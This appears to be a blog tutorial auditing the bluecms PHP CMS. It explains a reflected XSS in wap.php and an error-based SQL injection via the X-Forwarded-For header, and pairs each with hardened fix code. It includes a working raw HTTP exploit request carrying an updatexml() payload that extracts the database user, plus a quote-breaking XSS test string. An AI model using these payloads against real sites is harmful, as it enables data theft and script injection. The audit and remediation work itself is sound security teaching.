Getting started with bluecms code auditing
2022-06-27 02:08:00 【qq_42307500】
bluecms is a very simple CMS and a good starting point for PHP code auditing. Here the code is first scanned with Seay's automated auditor and each finding is then verified by hand.

Front-end (reflected) XSS in wap.php: the t parameter is read through $_REQUEST (so it can arrive via GET, POST or a cookie) and written straight into the page without any encoding.
<?php
// wap.php: the value is taken from the request and echoed below with no escaping
$t=$_REQUEST['t'];
//echo $t;
//exit;
?>
<script type="text/javascript">
// To simply redirect to the home page: with dynamic browsing enabled, set wap.php as the first default document; with static browsing enabled, set index.html as the first default document and add this user-agent check to index.html to redirect to the mobile site.
var mobileAgent = new Array("iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire");
var browser = navigator.userAgent.toLowerCase();
var isMobile = false;
for (var i=0; i<mobileAgent.length; i++)
{
if (browser.indexOf(mobileAgent[i])!=-1)
{
isMobile = true;
//alert(mobileAgent[i]);
// $_REQUEST['t'] lands inside this single-quoted JavaScript string unescaped
location.href = 'm.php?t=<?php echo $_REQUEST['t'] ?>';
break;
}
else
{
location.href = 'index.php?t=<?php echo $_REQUEST['t'] ?>';// do not add the mobile-site redirect check to the home page template
}
}
</script>
Requesting wap.php?t=<value> triggers it directly. Because $_REQUEST['t'] is echoed unescaped inside the single-quoted JavaScript string of the location.href assignment, any value that closes that quote continues as script in the visitor's browser; the fix has to encode for the JavaScript string context (or, better, allowlist the parameter), not just for HTML.
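The vulnerable pattern beside one way to harden it, as an added example that is not bluecms code. It assumes t is meant to be a short token forwarded to m.php/index.php (the CMS does not document its meaning), so the hardened version allowlists the value, percent-encodes it for the URL, and emits the whole URL as a JSON string literal so it can never terminate the JavaScript string or the script block.

```php
<?php
// Added example, not bluecms code: the pattern from wap.php beside a hardened version.
// Assumption: t is a short token handed to m.php/index.php; the CMS does not document it.

// Vulnerable: the request value is written unescaped into a single-quoted JS string.
function redirect_script_vulnerable(string $t): string
{
    return "location.href = 'm.php?t=" . $t . "';";
}

// Hardened: allowlist the value, percent-encode it for the URL, and emit the
// whole URL as a JSON string literal. The JSON_HEX_* flags escape ' " < > &
// so the value cannot close the string or the <script> block.
function redirect_script_hardened(string $t): string
{
    if (!preg_match('/^[A-Za-z0-9_-]{0,64}$/', $t)) {
        $t = ''; // anything that is not a plain token is dropped
    }
    $url  = 'm.php?t=' . rawurlencode($t);
    $json = json_encode($url, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
    return 'location.href = ' . $json . ';';
}

// Constructed input that closes the quote and appends its own statement.
$payload = "';alert(1);//";

echo "vulnerable: ", redirect_script_vulnerable($payload), "\n";
echo "hardened:   ", redirect_script_hardened($payload), "\n";
echo "hardened:   ", redirect_script_hardened('abc-123'), "\n";
```

Run it with `php wap_fix.php`: the first line shows the payload's quote ending the string and its `alert(1)` becoming a separate statement; the hardened output for the same input is a bare `location.href = "m.php?t=";` because the allowlist rejected it, and the token `abc-123` passes through unchanged. Applying htmlspecialchars() alone is the common wrong fix here; without ENT_QUOTES it leaves the single quote intact, which is exactly the character that matters in this context.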
The message board has an error-based SQL injection. When a guest posts a message, the client IP returned by GetIP() is not filtered, and GetIP() takes its value from the X-Forwarded-For header, so the header is spliced straight into the SQL statement's WHERE clause.
function add(){
// verification code check, only when enabled in the config
if($GLOBALS['G_DY']['vercode']==1){
if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message("Verification code error");
}
if(!$this->syArgs('tid'))message("Please select a column");
$tid=$this->syArgs('tid');
$this->type=syDB('classtype')->find(array('tid'=>$tid),null,'molds,classname,msubmit');
if($this->type['msubmit']!=1){
$this->member->p_r($this->type['msubmit']);
}
$isshow = ($this->my['group']['audit']==1) ? 1 : 0;
$user = ($this->my['id']!=0) ? $this->my['user'] : 'Guest';
$fmolds = ($this->syArgs('fmolds',1)!='') ? $this->syArgs('fmolds',1) : '';
$title = ($this->syArgs('title',1)!='') ? $this->syArgs('title',1) : $this->type['classname'];
$body = ($this->syArgs('body',1)!='') ? $this->syArgs('body',1) : '';
$row1 = array('tid' => $tid,'fmolds' => $fmolds,'faid' => $this->syArgs('faid'),'title' => $title,'addtime' => time(),'orders' => 0,'isshow' => $isshow,'user' => $user,'body' => $body,'reply'=>'');
$row2=$this->fields_args('message',$tid);
$add = syClass('c_message');
$newv=$add->syVerifier($row1);
echo $newv;
if(false == $newv)
{
$a=$add->create($row1);$row2=array_merge($row2,array('aid' => $a));
syDB('message_field')->create($row2);
// attach uploaded files (member_file) to the new message; the first array is the WHERE condition
if($this->my['id']!=0){
syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'uid'=>$this->my['id']),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
}else{
// guests are matched by IP: GetIP() returns the raw X-Forwarded-For value, which reaches the WHERE clause unescaped
syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'ip'=>GetIP()),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
}
//message('Posted successfully',$GLOBALS["WWW"]);//bluecms: return to the home page
message('Posted successfully');// return to the current page
}
else
{
message_err($newv);
}
}
Construct the request directly. The updatexml() payload in X-Forwarded-For forces a MySQL XPath syntax error whose message contains the result of the inner select, so the database user name comes back in the error text:
POST /index.php?c=message&a=add&tid=23 HTTP/1.1
Host: www.blue.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Forwarded-For: 8.8.8.8' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))####
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.blue.com:8080
Connection: close
Referer: http://www.blue.com:8080/?c=message&a=type&tid=23
Cookie: PHPSESSID=1gobivh9getno63fuj0d67knn5
Upgrade-Insecure-Requests: 1
title=111&u_nianlin=111&download=111&hand=0006197981&body=1111
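A hardened model of the guest branch of add(), as an added example rather than bluecms code. It assumes a single trusted reverse proxy at 10.0.0.1 and an invented member_file table, and uses an in-memory SQLite database in place of MySQL (so updatexml() itself is unavailable and only the structural fix is exercised). It shows the two layers a practitioner wants: only accept X-Forwarded-For from a known proxy and only when it is a syntactically valid IP, and bind the value as a query parameter so it can never alter the statement.

```php
<?php
// Added example, not bluecms code. Models the guest branch of add():
// syDB('member_file')->update(array('hand'=>..., 'ip'=>GetIP()), ...) builds its WHERE
// clause from GetIP(), which returns the raw X-Forwarded-For header.
// Assumptions: one trusted reverse proxy at 10.0.0.1; the member_file layout is invented;
// SQLite stands in for MySQL, so updatexml() is not available here.

function get_client_ip(array $server, array $trusted_proxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    // X-Forwarded-For is client-controlled; only honour it when the TCP peer is our proxy.
    if (in_array($remote, $trusted_proxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // A proxy appends the address it saw; earlier entries are whatever the client sent.
        $parts     = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $candidate = end($parts);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
}

// Constructed request: no proxy in front, the attacker sets the header directly.
$server = [
    'REMOTE_ADDR'          => '203.0.113.5',
    'HTTP_X_FORWARDED_FOR' => "8.8.8.8' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#",
];

// How the original code ends up: the header text becomes part of the statement.
$unsafe = "UPDATE member_file SET hand='0' WHERE hand='0006197981' AND ip='"
        . $server['HTTP_X_FORWARDED_FOR'] . "'";
echo "concatenated SQL: ", $unsafe, "\n";

// Layer 1: the header is ignored because 203.0.113.5 is not the trusted proxy;
// even if the peer were trusted, the payload is not a valid IP and is rejected.
$ip = get_client_ip($server, ['10.0.0.1']);
echo "client ip used: ", $ip, "\n";

// Layer 2: bind the value; it is only ever compared, never parsed as SQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE member_file (id INTEGER PRIMARY KEY, hand TEXT, ip TEXT, aid INTEGER, molds TEXT)');
$pdo->exec("INSERT INTO member_file (hand, ip, aid, molds) VALUES ('0006197981', '203.0.113.5', 0, 'message')");

$stmt = $pdo->prepare(
    "UPDATE member_file SET hand = '0', aid = :aid, molds = :molds WHERE hand = :hand AND ip = :ip"
);
$stmt->execute([
    ':aid'   => 42,
    ':molds' => 'message',
    ':hand'  => '0006197981',
    ':ip'    => $ip,
]);
echo "rows updated: ", $stmt->rowCount(), "\n";
```

Run with `php getip_fix.php` (pdo_sqlite is needed). The concatenated statement printed first is the shape the audit finding describes; get_client_ip() then falls back to REMOTE_ADDR, so the prepared update matches the one seeded row by its real address and the header content never reaches the parser. Validation alone is not the fix: even a well-formed IP must still be bound, because GetIP() is likely reused in other statements across the code base.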
That covers these two findings. Passwords in this CMS are hashed with two rounds of MD5, which is unsalted and fast, so it adds no real resistance to offline cracking. There are many more vulnerabilities in the code base that have not been audited here.